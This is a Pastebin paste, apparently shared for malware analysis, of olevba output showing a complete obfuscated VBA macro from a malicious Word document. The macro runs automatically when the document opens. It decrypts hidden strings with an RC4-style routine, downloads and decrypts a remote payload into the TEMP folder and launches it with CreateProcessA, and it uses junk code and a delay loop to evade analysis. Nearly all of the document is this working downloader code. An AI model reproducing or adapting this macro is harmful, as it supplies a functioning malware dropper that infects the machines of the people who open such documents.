SHARE
TWEET

Malicious Word macro

dynamoo Aug 10th, 2015 325 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MAS-HB-V gabrie~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: gabrie~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Option Explicit
  16. Private Declare Sub XtJgfXpzM0o Lib "msvbvm60" Alias "#183" (ByVal WFnd4OMfpypp As Long, ByVal MA8xSY34fYF As Long, ByVal Yr1EUCzWPEV As Long)
  17. Private RHxGLF7sfU9jTA(0 To 255) As Integer
  18. Private Declare Function InternetReadFile Lib "wininet" (ByVal BsQpCLLXzMEvnbP As Long, ByVal ByIUR9kXLkqd As String, ByVal IiE5gj As Long, FwLosyl3 As Long) As Integer
  19. Private Type HnF3nxQRcws6HMjP
  20.    UVv As Integer
  21.    Qoey8CXRBAw3 As Integer
  22.    O2jX1pn7C As Integer
  23.    SNovaUJISNL As Integer
  24.    R5EwrcPEV As Long
  25. End Type
  26. Private Declare Function InternetCloseHandle Lib "wininet" (ByRef BVl3mNCKlwA As Long) As Long
  27. Private NeeCb9nU As String
  28. Private Declare Function InternetOpenA Lib "wininet" (ByVal O6ZjTnc8OFWA5Bv As String, ByVal NozkkMPUli As Long, ByVal AraM As String, ByVal UTFUHhkgrn0i4EzDT As String, ByVal QrQmF As Long) As Long
  29. Private Declare Function CloseHandle Lib "kernel32" (ByVal TmZAxWwYeCO1Yf As Long) As Long
  30. Private Type L4B1C0pyIp
  31.    VAFd4ZagjNElZ As Long
  32.    Xd4V8MZgn As Long
  33.    RLz7m6u53j6da As Long
  34.    MoYi3kw937sOiZ As Long
  35. End Type
  36. Private Type SdZ6VX73YaIjvCV7r
  37.    YTNxZe1 As Long
  38.    PsgpZ4s7JFnTtwm As String
  39.    Nu5F8zzCCR As String
  40.    GRswFGc460eKR As String
  41.    XfJnRw6wqW As Long
  42.    BXqanWDcNG6IJOz As Long
  43.    BZl59mVWzJZ As Long
  44.    LfvUBOWp As Long
  45.    J9bvR3b2xs1 As Long
  46.    VMI4ild0Cyy As Long
  47.    KzjIDjo As Long
  48.    DQKDZf6ptgL As Long
  49.    P0TzA8k5axSX As Integer
  50.    Jd8LvaAh As Integer
  51.    JRP11gOcYuamB As Long
  52.    LNqJpp3sSFAi As Long
  53.    HlNQJVUgA As Long
  54.    XKZXzHQ8udx As Long
  55. End Type
  56. Private Declare Function CreateProcessA Lib "kernel32" (ByVal RqNE57PsnE6 As String, ByVal OO2mfAs4i6zKg As String, TcvsDu As Any, Tm87GuTDgI As Any, ByVal VSpjlsuu1 As Long, ByVal K1Zy As Long, QZmGMhCt5h8JUIY As Any, ByVal YaJkdiN6WRQ As String, U0h7Oa As SdZ6VX73YaIjvCV7r, AxRZ0A As L4B1C0pyIp) As Long
  57. Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal SdLGMi5LRTTc8OF As Long, ByVal GKmRqD0avhBh As String, ByVal JIT8V As String, ByVal PqbJ9yspgiViiWYI2 As Long, ByVal KezyxR As Long, ByVal HcNQZmZAxWwYeC As Long) As Long
  58. Private Type UP6g2cwz9
  59.    Jyq7kWxLEuXU As Byte
  60.    Psfw7jyizqX2pBr() As Byte
  61. End Type
  62. Private Property Let Uv3FkJoNQA(Duor5EX1QDGRv As String)
  63. Dim Nz7m0PxKYWw As Long, HbS1melaNAS7H As Long, L7N3MtqbtznJ As Byte, HmKeQofQiXVxVGCT() As Byte, L9EY5PIy8XL As Long
  64. If (NeeCb9nU = Duor5EX1QDGRv) Then Exit Property
  65. NeeCb9nU = Duor5EX1QDGRv
  66. HmKeQofQiXVxVGCT() = StrConv(NeeCb9nU, vbFromUnicode)
  67. L9EY5PIy8XL = Len(NeeCb9nU)
  68. For Nz7m0PxKYWw = 0 To 255
  69. RHxGLF7sfU9jTA(Nz7m0PxKYWw) = Nz7m0PxKYWw
  70. Next Nz7m0PxKYWw
  71. For Nz7m0PxKYWw = 0 To 255
  72. HbS1melaNAS7H = (HbS1melaNAS7H + RHxGLF7sfU9jTA(Nz7m0PxKYWw) + HmKeQofQiXVxVGCT(Nz7m0PxKYWw Mod L9EY5PIy8XL)) Mod 256
  73. L7N3MtqbtznJ = RHxGLF7sfU9jTA(Nz7m0PxKYWw)
  74. RHxGLF7sfU9jTA(Nz7m0PxKYWw) = RHxGLF7sfU9jTA(HbS1melaNAS7H)
  75. RHxGLF7sfU9jTA(HbS1melaNAS7H) = L7N3MtqbtznJ
  76. Next
  77. End Property
  78. Private Function XCDD1KlyfOUL(MuPhPeG3mQ As String) As String
  79. Dim LvAzbXXkWUDtDQ() As Byte
  80. LvAzbXXkWUDtDQ() = StrConv(MuPhPeG3mQ, vbFromUnicode)
  81. U4j0Mutcw LvAzbXXkWUDtDQ, Len(MuPhPeG3mQ)
  82. XCDD1KlyfOUL = StrConv(LvAzbXXkWUDtDQ(), vbUnicode)
  83. End Function
  84. Private Function BRfjljWglIbMl(ByVal YJWdGt9qTqFwPH7i As String, ByVal VD95k1JIF As String, ByVal WVmg38wK9PrBsoCtu As String) As Boolean
  85. Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long
  86. ACIZjEo8pvcIr = 80
  87. I3wVba3qWHhnCuC = 19
  88. If ACIZjEo8pvcIr + I3wVba3qWHhnCuC > 4 Then
  89. I3wVba3qWHhnCuC = ACIZjEo8pvcIr + 29
  90. Else
  91. MsgBox 45
  92. End If
  93. Dim FP3AL83PNIVhYqp As Long, Bhu6AVZ As Long, HzD7nSW As Long, IFHWQgDBF4yZ As String * 8162, JkOPSi As String, I0xSQ As Integer, YBoXWN0Xv As Double
  94. Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long
  95. AI9EyT0hz = 55
  96. LDwIMi8qU8zv = 92
  97. If AI9EyT0hz + LDwIMi8qU8zv > 4 Then
  98. LDwIMi8qU8zv = AI9EyT0hz + 8
  99. Else
  100. MsgBox 87
  101. End If
  102. FP3AL83PNIVhYqp = InternetOpenA(IqAGSLPUAJG(Chr(67) + Chr(59) + Chr(213) + Chr(21) + Chr(152) + Chr(247) + Chr(165) + Chr(137) + Chr(22) + Chr(103) + Chr(186) + Chr(195) + Chr(29) + Chr(120) + Chr(96) + Chr(214) + Chr(246) + Chr(92) + Chr(44) + Chr(9) + Chr(6) + Chr(16) + Chr(144) + Chr(41) + Chr(68) + Chr(57) + Chr(183) + Chr(140) + Chr(2) + Chr(115) + Chr(127) + Chr(9) + Chr(142) + Chr(166) + Chr(107) + Chr(124) + Chr(21) + Chr(81) + Chr(45) + Chr(249) + Chr(16) + Chr(46) + Chr(215) + Chr(115) + Chr(22) + Chr(147) + Chr(29) + Chr(237) + Chr(9) + Chr(93) + Chr(31) + Chr(76) + Chr(87) + Chr(187) + Chr(48) + Chr(26) + Chr(205) + Chr(30) + Chr(194) + Chr(246) + Chr(158) + Chr(104) + Chr(0) + Chr(24) + Chr(182) + Chr(106) + Chr(151), "GqhL"), 1, vbNullString, vbNullString, 0)
  103. Dim BkbpvlCIZj As Long, VS1rCLO33mU As Long
  104. BkbpvlCIZj = 4
  105. VS1rCLO33mU = 22
  106. If BkbpvlCIZj + VS1rCLO33mU > 4 Then
  107. VS1rCLO33mU = BkbpvlCIZj + 67
  108. Else
  109. MsgBox 57
  110. End If
  111. If FP3AL83PNIVhYqp = 0 Then
  112. Dim ILWUKAm As Long, JRN9ZgNj6Yf As Long
  113. ILWUKAm = 89
  114. JRN9ZgNj6Yf = 89
  115. If ILWUKAm + JRN9ZgNj6Yf > 4 Then
  116. JRN9ZgNj6Yf = ILWUKAm + 42
  117. Else
  118. MsgBox 58
  119. End If
  120.   BRfjljWglIbMl = False
  121.   Exit Function
  122. End If
  123. Dim WqZT6KvAVkyO As Long, OHPW2b0ZGFa As Long
  124. WqZT6KvAVkyO = 74
  125. OHPW2b0ZGFa = 62
  126. If WqZT6KvAVkyO + OHPW2b0ZGFa > 4 Then
  127. OHPW2b0ZGFa = WqZT6KvAVkyO + 97
  128. Else
  129. MsgBox 91
  130. End If
  131. Bhu6AVZ = InternetOpenUrlA(FP3AL83PNIVhYqp, YJWdGt9qTqFwPH7i, vbNullString, 0, &H4000000, 0)
  132. Dim HbUu4uL As Long, GfUsdMAvdCRNJDXy8 As Long
  133. HbUu4uL = 81
  134. GfUsdMAvdCRNJDXy8 = 16
  135. If HbUu4uL + GfUsdMAvdCRNJDXy8 > 4 Then
  136. GfUsdMAvdCRNJDXy8 = HbUu4uL + 39
  137. Else
  138. MsgBox 16
  139. End If
  140. If Bhu6AVZ = 0 Then
  141. Dim AizpYIBM As Long, BYtWR9n2OwKs As Long
  142. AizpYIBM = 53
  143. BYtWR9n2OwKs = 27
  144. If AizpYIBM + BYtWR9n2OwKs > 4 Then
  145. BYtWR9n2OwKs = AizpYIBM + 78
  146. Else
  147. MsgBox 22
  148. End If
  149.   YBoXWN0Xv = 0
  150. Else
  151. Dim Izv2Cof As Long, Ntxt3NxnUsY As Long
  152. Izv2Cof = 90
  153. Ntxt3NxnUsY = 60
  154. If Izv2Cof + Ntxt3NxnUsY > 4 Then
  155. Ntxt3NxnUsY = Izv2Cof + 52
  156. Else
  157. MsgBox 30
  158. End If
  159. InternetReadFile Bhu6AVZ, IFHWQgDBF4yZ, 8162, HzD7nSW
  160. JkOPSi = IFHWQgDBF4yZ
  161. Dim V0fF89S As Long, HVcFPWU6 As Long
  162. V0fF89S = 25
  163. HVcFPWU6 = 85
  164. If V0fF89S + HVcFPWU6 > 4 Then
  165. HVcFPWU6 = V0fF89S + 3
  166. Else
  167. MsgBox 4
  168. End If
  169. Do While HzD7nSW <> 0
  170.   InternetReadFile Bhu6AVZ, IFHWQgDBF4yZ, 8162, HzD7nSW
  171.   JkOPSi = JkOPSi + Mid(IFHWQgDBF4yZ, 1, HzD7nSW)
  172. Loop
  173. YBoXWN0Xv = Len(JkOPSi)
  174. Dim K1Xi As Long, QZlNuLHUlh7Q2xe As Long
  175. K1Xi = 24
  176. QZlNuLHUlh7Q2xe = 13
  177. If K1Xi + QZlNuLHUlh7Q2xe > 4 Then
  178. QZlNuLHUlh7Q2xe = K1Xi + 92
  179. Else
  180. MsgBox 53
  181. End If
  182. I0xSQ = FreeFile
  183. Dim GPlaAi As Long, JIM8pwVkCW8UVbcg As Long
  184. GPlaAi = 64
  185. JIM8pwVkCW8UVbcg = 91
  186. If GPlaAi + JIM8pwVkCW8UVbcg > 4 Then
  187. JIM8pwVkCW8UVbcg = GPlaAi + 11
  188. Else
  189. MsgBox 51
  190. End If
  191. Open VD95k1JIF For Binary Access Write Lock Write As #I0xSQ
  192. Put #I0xSQ, , XCDD1KlyfOUL(IqAGSLPUAJG(JkOPSi, WVmg38wK9PrBsoCtu))
  193. Dim Oq8fiSM As Long, YvnMiEy2R6 As Long
  194. Oq8fiSM = 80
  195. YvnMiEy2R6 = 73
  196. If Oq8fiSM + YvnMiEy2R6 > 4 Then
  197. YvnMiEy2R6 = Oq8fiSM + 95
  198. Else
  199. MsgBox 28
  200. End If
  201. Close #I0xSQ
  202. End If
  203. InternetCloseHandle Bhu6AVZ
  204. Dim B9v7TU As Long, JCVUa86krMIbHfc As Long
  205. B9v7TU = 52
  206. JCVUa86krMIbHfc = 59
  207. If B9v7TU + JCVUa86krMIbHfc > 4 Then
  208. JCVUa86krMIbHfc = B9v7TU + 10
  209. Else
  210. MsgBox 86
  211. End If
  212. InternetCloseHandle FP3AL83PNIVhYqp
  213. JkOPSi = ""
  214. If YBoXWN0Xv Then
  215.   BRfjljWglIbMl = True
  216. Dim KKDp5Ep2gOzyvo As Long, Tl1iPS1z8j As Long
  217. KKDp5Ep2gOzyvo = 22
  218. Tl1iPS1z8j = 75
  219. If KKDp5Ep2gOzyvo + Tl1iPS1z8j > 4 Then
  220. Tl1iPS1z8j = KKDp5Ep2gOzyvo + 14
  221. Else
  222. MsgBox 73
  223. End If
  224. End If
  225. Dim LwX3RpBGRr As Long, Ne5f44rm9prF As Long
  226. LwX3RpBGRr = 91
  227. Ne5f44rm9prF = 13
  228. If LwX3RpBGRr + Ne5f44rm9prF > 4 Then
  229. Ne5f44rm9prF = LwX3RpBGRr + 2
  230. Else
  231. MsgBox 37
  232. End If
  233. End Function
  234. Private Sub GuQHe80AnN(IoX() As HnF3nxQRcws6HMjP, FihxAWkN5rFeaSJ As Long, UyXExoRTt As Long, Dc4RjY As UP6g2cwz9)
  235. Dim RB8PuM7tI59 As Integer, LNBqYXa9HC1mwf As Long
  236. LNBqYXa9HC1mwf = 0
  237. For RB8PuM7tI59 = 0 To (Dc4RjY.Jyq7kWxLEuXU - 1)
  238. If (Dc4RjY.Psfw7jyizqX2pBr(RB8PuM7tI59) = 0) Then
  239. If (IoX(LNBqYXa9HC1mwf).O2jX1pn7C = -1) Then
  240. IoX(LNBqYXa9HC1mwf).O2jX1pn7C = FihxAWkN5rFeaSJ
  241. IoX(FihxAWkN5rFeaSJ).UVv = LNBqYXa9HC1mwf
  242. IoX(FihxAWkN5rFeaSJ).O2jX1pn7C = -1
  243. IoX(FihxAWkN5rFeaSJ).Qoey8CXRBAw3 = -1
  244. IoX(FihxAWkN5rFeaSJ).SNovaUJISNL = -1
  245. FihxAWkN5rFeaSJ = FihxAWkN5rFeaSJ + 1
  246. End If
  247. LNBqYXa9HC1mwf = IoX(LNBqYXa9HC1mwf).O2jX1pn7C
  248. ElseIf (Dc4RjY.Psfw7jyizqX2pBr(RB8PuM7tI59) = 1) Then
  249. If (IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3 = -1) Then
  250. IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3 = FihxAWkN5rFeaSJ
  251. IoX(FihxAWkN5rFeaSJ).UVv = LNBqYXa9HC1mwf
  252. IoX(FihxAWkN5rFeaSJ).O2jX1pn7C = -1
  253. IoX(FihxAWkN5rFeaSJ).Qoey8CXRBAw3 = -1
  254. IoX(FihxAWkN5rFeaSJ).SNovaUJISNL = -1
  255. FihxAWkN5rFeaSJ = FihxAWkN5rFeaSJ + 1
  256. End If
  257. LNBqYXa9HC1mwf = IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3
  258. Else
  259. Stop
  260. End If
  261. Next
  262. IoX(LNBqYXa9HC1mwf).SNovaUJISNL = UyXExoRTt
  263. End Sub
  264. Function IqAGSLPUAJG(Svpxb5hcj9Hc As String, YNVoDatBR As String) As String
  265. Dim MpMnYYUrP73 As Long, ROetXCPNdldbjBRLL As Long
  266. MpMnYYUrP73 = 22
  267. ROetXCPNdldbjBRLL = 75
  268. If MpMnYYUrP73 + ROetXCPNdldbjBRLL > 4 Then
  269. ROetXCPNdldbjBRLL = MpMnYYUrP73 + 14
  270. Else
  271. MsgBox 73
  272. End If
  273. Dim byteArray() As Byte
  274. byteArray() = StrConv(Svpxb5hcj9Hc, vbFromUnicode)
  275. BUqflSnxcA4 byteArray(), YNVoDatBR
  276. IqAGSLPUAJG = StrConv(byteArray(), vbUnicode)
  277. Dim HTZPNFjjDT2 As Long, SaND1oEkTy6p As Long
  278. HTZPNFjjDT2 = 71
  279. SaND1oEkTy6p = 95
  280. If HTZPNFjjDT2 + SaND1oEkTy6p > 4 Then
  281. SaND1oEkTy6p = HTZPNFjjDT2 + 49
  282. Else
  283. MsgBox 87
  284. End If
  285. End Function
  286. Private Function AFwPH7i46wGhOhKi(Optional A9PrBsoCtu7 As String = "0123456789") As String
  287. Dim KX0xfoqZ As Long, XwCIaRypq03 As Long
  288. KX0xfoqZ = 77
  289. XwCIaRypq03 = 4
  290. If KX0xfoqZ + XwCIaRypq03 > 4 Then
  291. XwCIaRypq03 = KX0xfoqZ + 24
  292. Else
  293. MsgBox 64
  294. End If
  295. Dim V3K42() As Byte, GL8BfUcBbEoS() As Byte, RDQPNIVhYqp As Long, JUgDQryKOCh As Long, EazVmg38wK As Long, NFE As String
  296. Dim Tb95B8i6DxgFsGcd As Long, HZPNFjjDT2oc6c9Vy As Long
  297. Tb95B8i6DxgFsGcd = 56
  298. HZPNFjjDT2oc6c9Vy = 13
  299. If Tb95B8i6DxgFsGcd + HZPNFjjDT2oc6c9Vy > 4 Then
  300. HZPNFjjDT2oc6c9Vy = Tb95B8i6DxgFsGcd + 71
  301. Else
  302. MsgBox 67
  303. End If
  304. EazVmg38wK = 0
  305. Dim VGBgsnX3r5L As Long, Dxwz5QD As Long
  306. VGBgsnX3r5L = 84
  307. Dxwz5QD = 81
  308. If VGBgsnX3r5L + Dxwz5QD > 4 Then
  309. Dxwz5QD = VGBgsnX3r5L + 90
  310. Else
  311. MsgBox 62
  312. End If
  313. GKs2Tl:
  314. Dim Uc0lRQhC4jaN7 As Long, Hl7hjLXCBG As Long
  315. Uc0lRQhC4jaN7 = 85
  316. Hl7hjLXCBG = 78
  317. If Uc0lRQhC4jaN7 + Hl7hjLXCBG > 4 Then
  318. Hl7hjLXCBG = Uc0lRQhC4jaN7 + 1
  319. Else
  320. MsgBox 33
  321. End If
  322. Randomize
  323. NFE = Int(30 * Rnd)
  324. If NFE < 4 Then GoTo GKs2Tl
  325. EazVmg38wK = NFE
  326. If EazVmg38wK > 0& Then
  327. Dim EhzZDcEu As Long, Cm6XVQSt0NPM As Long
  328. EhzZDcEu = 80
  329. Cm6XVQSt0NPM = 94
  330. If EhzZDcEu + Cm6XVQSt0NPM > 4 Then
  331. Cm6XVQSt0NPM = EhzZDcEu + 52
  332. Else
  333. MsgBox 77
  334. End If
  335. Randomize
  336. V3K42 = A9PrBsoCtu7
  337. Dim QCwa3abOUkh As Long, SwyAklrkV6C4LZi As Long
  338. QCwa3abOUkh = 84
  339. SwyAklrkV6C4LZi = 53
  340. If QCwa3abOUkh + SwyAklrkV6C4LZi > 4 Then
  341. SwyAklrkV6C4LZi = QCwa3abOUkh + 74
  342. Else
  343. MsgBox 85
  344. End If
  345. RDQPNIVhYqp = Len(A9PrBsoCtu7) - 1&
  346. EazVmg38wK = (EazVmg38wK * 2&) - 1&
  347. Dim IUKvWfty As Long, PwY9F2JkA As Long
  348. IUKvWfty = 29
  349. PwY9F2JkA = 46
  350. If IUKvWfty + PwY9F2JkA > 4 Then
  351. PwY9F2JkA = IUKvWfty + 69
  352. Else
  353. MsgBox 24
  354. End If
  355. ReDim GL8BfUcBbEoS(EazVmg38wK) As Byte
  356. For JUgDQryKOCh = 0& To EazVmg38wK Step 2&
  357. GL8BfUcBbEoS(JUgDQryKOCh) = V3K42(CLng(RDQPNIVhYqp * Rnd) * 2&)
  358. Next
  359. Dim DiT8qxL As Long, Ht4qxpGiCdM As Long
  360. DiT8qxL = 94
  361. Ht4qxpGiCdM = 50
  362. If DiT8qxL + Ht4qxpGiCdM > 4 Then
  363. Ht4qxpGiCdM = DiT8qxL + 10
  364. Else
  365. MsgBox 78
  366. End If
  367. End If
  368. Dim DqjDljxQl1 As Long, OYFEfskkJd As Long
  369. DqjDljxQl1 = 72
  370. OYFEfskkJd = 42
  371. If DqjDljxQl1 + OYFEfskkJd > 4 Then
  372. OYFEfskkJd = DqjDljxQl1 + 7
  373. Else
  374. MsgBox 12
  375. End If
  376. AFwPH7i46wGhOhKi = GL8BfUcBbEoS
  377. Dim OtzUoqPfJBgR As Long, TcUKOAdU5u As Long
  378. OtzUoqPfJBgR = 81
  379. TcUKOAdU5u = 17
  380. If OtzUoqPfJBgR + TcUKOAdU5u > 4 Then
  381. TcUKOAdU5u = OtzUoqPfJBgR + 11
  382. Else
  383. MsgBox 54
  384. End If
  385. End Function
  386. Sub HOglzOSpjr9h(JKRfEn As Long)
  387. Dim CAplbsdkljPz7 As Long, Id24U2e1NOsFmrSQm As Long
  388. CAplbsdkljPz7 = 77
  389. Id24U2e1NOsFmrSQm = 73
  390. If CAplbsdkljPz7 + Id24U2e1NOsFmrSQm > 4 Then
  391. Id24U2e1NOsFmrSQm = CAplbsdkljPz7 + 39
  392. Else
  393. MsgBox 17
  394. End If
  395. Dim PocouifAMac As Long
  396. Dim FOAdU5ue As Long, DRPjKIqgqa As Long
  397. FOAdU5ue = 98
  398. DRPjKIqgqa = 37
  399. If FOAdU5ue + DRPjKIqgqa > 4 Then
  400. DRPjKIqgqa = FOAdU5ue + 48
  401. Else
  402. MsgBox 63
  403. End If
  404. PocouifAMac = Timer + JKRfEn
  405. Do While Timer < PocouifAMac
  406. DoEvents
  407. Loop
  408. Dim JjMWu As Long, Oe6vqA48 As Long
  409. JjMWu = 28
  410. Oe6vqA48 = 49
  411. If JjMWu + Oe6vqA48 > 4 Then
  412. Oe6vqA48 = JjMWu + 60
  413. Else
  414. MsgBox 53
  415. End If
  416. End Sub
  417. Sub BUqflSnxcA4(N5eK6er7Tq80J5O() As Byte, Optional Nn4LNDdOko As String)
  418. Dim AqfL As Long, USK5uYyaKrznfrpS As Long, UISSgE9sWQpCZRT As Byte, GE0OEFxN540yRo As Long, I4uc9FMhZVQ5 As Long, I0xRV As Long, YBnG6IJOz(0 To 255) As Integer
  419. If (Len(Nn4LNDdOko) > 0) Then Uv3FkJoNQA = Nn4LNDdOko
  420. XtJgfXpzM0o 512, VarPtr(YBnG6IJOz(0)), VarPtr(RHxGLF7sfU9jTA(0))
  421. I4uc9FMhZVQ5 = UBound(N5eK6er7Tq80J5O) + 1
  422. I0xRV = I4uc9FMhZVQ5
  423. For GE0OEFxN540yRo = 0 To (I4uc9FMhZVQ5 - 1)
  424. AqfL = (AqfL + 1) Mod 256
  425. USK5uYyaKrznfrpS = (USK5uYyaKrznfrpS + YBnG6IJOz(AqfL)) Mod 256
  426. UISSgE9sWQpCZRT = YBnG6IJOz(AqfL)
  427. YBnG6IJOz(AqfL) = YBnG6IJOz(USK5uYyaKrznfrpS)
  428. YBnG6IJOz(USK5uYyaKrznfrpS) = UISSgE9sWQpCZRT
  429. N5eK6er7Tq80J5O(GE0OEFxN540yRo) = N5eK6er7Tq80J5O(GE0OEFxN540yRo) Xor (YBnG6IJOz((YBnG6IJOz(AqfL) + YBnG6IJOz(USK5uYyaKrznfrpS)) Mod 256))
  430. Next
  431. End Sub
  432. Private Function I6aL9VLToJH(IIJfd79SYH5wwt As String)
  433. Dim Oq6oBCvt As Long, FJRGcif8CeY As Long
  434. Oq6oBCvt = 73
  435. FJRGcif8CeY = 96
  436. If Oq6oBCvt + FJRGcif8CeY > 4 Then
  437. FJRGcif8CeY = Oq6oBCvt + 29
  438. Else
  439. MsgBox 31
  440. End If
  441. Dim MoEVGldi9Pup9e As L4B1C0pyIp, QKALtRfjljW As SdZ6VX73YaIjvCV7r, P2aN9z5AlMfsXf8 As String
  442. Dim B9v5cx As Long, JDTc31TT8AIYP9WO As Long
  443. B9v5cx = 52
  444. JDTc31TT8AIYP9WO = 60
  445. If B9v5cx + JDTc31TT8AIYP9WO > 4 Then
  446. JDTc31TT8AIYP9WO = B9v5cx + 10
  447. Else
  448. MsgBox 60
  449. End If
  450. QKALtRfjljW.YTNxZe1 = Len(QKALtRfjljW)
  451. Dim P7eVeEw As Long, C15ddnl As Long
  452. P7eVeEw = 27
  453. C15ddnl = 10
  454. If P7eVeEw + C15ddnl > 4 Then
  455. C15ddnl = P7eVeEw + 36
  456. Else
  457. MsgBox 56
  458. End If
  459. CreateProcessA P2aN9z5AlMfsXf8, IIJfd79SYH5wwt, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, P2aN9z5AlMfsXf8, QKALtRfjljW, MoEVGldi9Pup9e
  460. Dim LhmuH4VRs1xHC As Long, H6q6euaQG As Long
  461. LhmuH4VRs1xHC = 21
  462. H6q6euaQG = 56
  463. If LhmuH4VRs1xHC + H6q6euaQG > 4 Then
  464. H6q6euaQG = LhmuH4VRs1xHC + 95
  465. Else
  466. MsgBox 32
  467. End If
  468. CloseHandle MoEVGldi9Pup9e.Xd4V8MZgn
  469. Dim INFCAmW As Long, U8anbJYc3TqIt As Long
  470. INFCAmW = 91
  471. U8anbJYc3TqIt = 42
  472. If INFCAmW + U8anbJYc3TqIt > 4 Then
  473. U8anbJYc3TqIt = INFCAmW + 92
  474. Else
  475. MsgBox 14
  476. End If
  477. CloseHandle MoEVGldi9Pup9e.VAFd4ZagjNElZ
  478. Dim DTX1gtN5Etn As Long, ITR2NqD73zEjThC As Long
  479. DTX1gtN5Etn = 39
  480. ITR2NqD73zEjThC = 74
  481. If DTX1gtN5Etn + ITR2NqD73zEjThC > 4 Then
  482. ITR2NqD73zEjThC = DTX1gtN5Etn + 68
  483. Else
  484. MsgBox 13
  485. End If
  486. End Function
  487. Private Sub Document_Open()
  488. On Error Resume Next
  489. Dim LicbWXf9C39mI As Long, YltsZTviWcDTTKc As Long
  490. LicbWXf9C39mI = 97
  491. YltsZTviWcDTTKc = 97
  492. If LicbWXf9C39mI + YltsZTviWcDTTKc > 4 Then
  493. YltsZTviWcDTTKc = LicbWXf9C39mI + 50
  494. Else
  495. MsgBox 66
  496. End If
  497. Dim TCKNX7GS4f1GV0Ho As String
  498. Dim Oa2PY3b09Ma8Osw As Long, KEJJJJS0yRP6B As Long
  499. Oa2PY3b09Ma8Osw = 69
  500. KEJJJJS0yRP6B = 9
  501. If Oa2PY3b09Ma8Osw + KEJJJJS0yRP6B > 4 Then
  502. KEJJJJS0yRP6B = Oa2PY3b09Ma8Osw + 64
  503. Else
  504. MsgBox 72
  505. End If
  506. Dim Dmw40jHKBJjB9 As Long, IaSts As Long, YQS6bf2fAQnn As Long, IaP5sruk As Integer
  507. Dim PTCG0rEhEjTjzJVD As Long, KjhQdJYB4mT9F As Long
  508. PTCG0rEhEjTjzJVD = 33
  509. KjhQdJYB4mT9F = 12
  510. If PTCG0rEhEjTjzJVD + KjhQdJYB4mT9F > 4 Then
  511. KjhQdJYB4mT9F = PTCG0rEhEjTjzJVD + 51
  512. Else
  513. MsgBox 32
  514. End If
  515. Dmw40jHKBJjB9 = 972912137: IaSts = 0: YQS6bf2fAQnn = 0
  516. Dim KHFoa As Long, PRLSJPXfkG As Long
  517. KHFoa = 14
  518. PRLSJPXfkG = 17
  519. If KHFoa + PRLSJPXfkG > 4 Then
  520. PRLSJPXfkG = KHFoa + 35
  521. Else
  522. MsgBox 80
  523. End If
  524. For IaSts = 1 To Dmw40jHKBJjB9
  525. YQS6bf2fAQnn = YQS6bf2fAQnn + 1
  526. Next IaSts
  527. Dim RZpj As Long, D8mlE4Yi As Long
  528. RZpj = 80
  529. D8mlE4Yi = 70
  530. If RZpj + D8mlE4Yi > 4 Then
  531. D8mlE4Yi = RZpj + 27
  532. Else
  533. MsgBox 31
  534. End If
  535. If YQS6bf2fAQnn = Dmw40jHKBJjB9 Then
  536. Dim OLUvI As Long, T6UKy2acaAV As Long
  537. OLUvI = 29
  538. T6UKy2acaAV = 71
  539. If OLUvI + T6UKy2acaAV > 4 Then
  540. T6UKy2acaAV = OLUvI + 95
  541. Else
  542. MsgBox 24
  543. End If
  544. TCKNX7GS4f1GV0Ho = Environ(IqAGSLPUAJG(Chr(124) + Chr(208) + Chr(114) + Chr(78) + Chr(249) + Chr(36) + Chr(219), "BhyJXF")) & "\" & AFwPH7i46wGhOhKi & IqAGSLPUAJG(Chr(165) + Chr(189) + Chr(190) + Chr(147), "FLxpiRLnai55OiV")
  545. Dim ULi3LSMNlBhC1 As Long, IAxLcX68j2 As Long
  546. ULi3LSMNlBhC1 = 57
  547. IAxLcX68j2 = 13
  548. If ULi3LSMNlBhC1 + IAxLcX68j2 > 4 Then
  549. IAxLcX68j2 = ULi3LSMNlBhC1 + 72
  550. Else
  551. MsgBox 42
  552. End If
  553. If BRfjljWglIbMl(IqAGSLPUAJG(Chr(165) + Chr(171) + Chr(208) + Chr(152) + Chr(194) + Chr(170) + Chr(210) + Chr(42) + Chr(115) + Chr(114) + Chr(162) + Chr(44) + Chr(182) + Chr(181) + Chr(222) + Chr(240) + Chr(0) + Chr(243) + Chr(36) + Chr(171) + Chr(110) + Chr(97) + Chr(59) + Chr(50) + Chr(35), "IL3o18Se4V3"), TCKNX7GS4f1GV0Ho, IqAGSLPUAJG(Chr(64) + Chr(61) + Chr(78) + Chr(113) + Chr(183) + Chr(138) + Chr(19) + Chr(108) + Chr(104), "YjNITkQAmKjm")) = True Then
  554. Dim BxUKE9hlz9 As Long, Ef1V1XFqA7tOEw As Long
  555. BxUKE9hlz9 = 20
  556. Ef1V1XFqA7tOEw = 10
  557. If BxUKE9hlz9 + Ef1V1XFqA7tOEw > 4 Then
  558. Ef1V1XFqA7tOEw = BxUKE9hlz9 + 66
  559. Else
  560. MsgBox 69
  561. End If
  562. HOglzOSpjr9h 1
  563. Dim KwNJNlJHYP As Long, LZGp6tFEOxl As Long
  564. KwNJNlJHYP = 80
  565. LZGp6tFEOxl = 25
  566. If KwNJNlJHYP + LZGp6tFEOxl > 4 Then
  567. LZGp6tFEOxl = KwNJNlJHYP + 66
  568. Else
  569. MsgBox 14
  570. End If
  571. I6aL9VLToJH TCKNX7GS4f1GV0Ho
  572. Dim IVhK As Long, LU9NRXI6m As Long
  573. IVhK = 31
  574. LU9NRXI6m = 47
  575. If IVhK + LU9NRXI6m > 4 Then
  576. LU9NRXI6m = IVhK + 71
  577. Else
  578. MsgBox 26
  579. End If
  580. End If
